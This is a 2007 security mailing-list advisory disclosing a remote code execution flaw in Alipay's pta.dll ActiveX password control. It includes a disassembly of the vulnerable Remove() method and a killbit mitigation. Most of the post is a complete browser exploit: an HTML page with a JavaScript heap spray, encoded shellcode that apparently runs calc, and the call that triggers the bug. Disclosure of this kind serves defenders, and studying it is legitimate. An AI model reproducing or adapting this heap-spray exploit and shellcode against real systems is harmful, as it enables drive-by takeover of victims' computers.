[<prev] [next>] [day] [month] [year] [list]
Message-ID: <BAY129-F3230E3AC16979CA23CFD2CB9E0@phx.gbl>
Date: Wed, 07 Feb 2007 03:49:10 +0000
From: "ruder cocoruder" <frankruder@...mail.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Alibaba Alipay Remote Code Execute
Vulnerability-0DAY
Alibaba Alipay Remote Code Execute Vulnerability
by cocoruder(frankruder_at_hotmail.com)
http://ruder.cdut.net
Summary:
Alipay is China’s leading online payment service, and a division of
Alibaba.com. It enables individuals and businesses to securely, easily and
quickly send and receive payments online. Alipay works like an escrow
service, solving the issue of settlement risk in China. More details:
https://www.alipay.com
There exists a remote code execute vulnerability in alipay's passsword
input control "pta.dll". A remote attacker who successfully exploit these
vulnerabilities can completely take control of the affected system.
Affected Software Versions:
All current versions
Details:
This vulnerability exist in the function "Remove()" educed by
"pta.dll", following are some related imformations:
InprocServer32: pta.dll
ClassID : 66F50F46-70A0-4A05-BD5E-FBCC0F9641EC
[id(0x60030001), helpstring("method Remove")]
void Remove([in] int idx);
Let's see How function "Remove()" process the parameter "idx":
.text:10003D4E ; Remove
.text:10003D4E
.text:10003D4E sub_10003D4E proc near ; DATA XREF: .rdata:1000B3A4.o
.text:10003D4E ; .rdata:1000B41C.o ...
.text:10003D4E
.text:10003D4E arg_0 = dword ptr 4
.text:10003D4E arg_4 = dword ptr 8
.text:10003D4E
.text:10003D4E mov eax, [esp+arg_4]
.text:10003D52 test eax, eax
.text:10003D54 jl short loc_10003D78
.text:10003D56 push esi
.text:10003D57 mov esi, [esp+4+arg_0] ; get idx
.text:10003D5B shl eax, 4 ; idx << 4
.text:10003D5E add eax, [esi+8] ; [esi+8]=0
.text:10003D61 push edi ;
.text:10003D62 mov edi, eax ; idx << 4 ==>edi
.text:10003D64 mov eax, [edi+8] ; [(idx << 4)+8]
==>eax
.text:10003D67 push eax
.text:10003D68 mov ecx, [eax] ; [[(idx <<
4)+8]]==>ecx
.text:10003D6A call dword ptr [ecx+8] ; [[[(idx <<
4)+8]]+8]==>jmp addr
.text:10003D6D push edi
.text:10003D6E lea ecx, [esi+4]
.text:10003D71 call sub_10003F35
.text:10003D76 pop edi
.text:10003D77 pop esi
.text:10003D78
.text:10003D78 loc_10003D78: ; CODE XREF: sub_10003D4E+6.j
.text:10003D78 xor eax, eax
.text:10003D7A retn 8
.text:10003D7A sub_10003D4E endp
The idx is a DWORD vaule what we can control, so we can complete an
interesting attack, for example when we set the idx 0x41414141, the
procedure will execute codes of address [[[14141410h+8]]+8].
Solution:
Set a killbit for "pta.dll", or, delete %system%\aliedit\pta.dll if you
do not use Alipay.
Disclosure Timeline:
2007.02.07 Advisory release
Attached File:
Here give an exploit, we se all address 0x0d0d0d0d which will access
its value, can gain attack result nicely.
Warning: This exploit is just used for reproducing the vulnerability,
please do not used for others.
/************************************************************************************************
Alipay ActiveX Remote Code Execute Exploit,enjoy it:)
by cocoruder(frankruder_at_hotmail.com)
http://ruder.cdut.net
*************************************************************************************************/
<html>
<head>
<OBJECT ID="com"
CLASSID="CLSID:{66F50F46-70A0-4A05-BD5E-FBCC0F9641EC}"></OBJECT>
</head>
<body>
<SCRIPT language="javascript">
function ClickForRunCalc()
{
var heapSprayToAddress = 0x0d0d0d0d;
var payLoadCode =
unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090"+"%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
var heapBlockSize = 0x400000;
var payLoadSize = payLoadCode.length * 2;
var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
var spraySlide = unescape("%u0d0d%u0d0d");
spraySlide = getSpraySlide(spraySlide,spraySlideSize);
heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;
memory = new Array();
for (i=0;i<heapBlocks;i++)
{
memory[i] = spraySlide + payLoadCode;
}
com.Remove(0x00d0d0d0);
function getSpraySlide(spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
{
spraySlide += spraySlide;
}
spraySlide = spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
}
}
</script>
<button onclick="javascript:ClickForRunCalc();">ClickForRunCalc</button>
</body>
</html>
--EOF--
_________________________________________________________________
享用世界上最大的电子邮件系统― MSN Hotmail。 http://www.hotmail.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists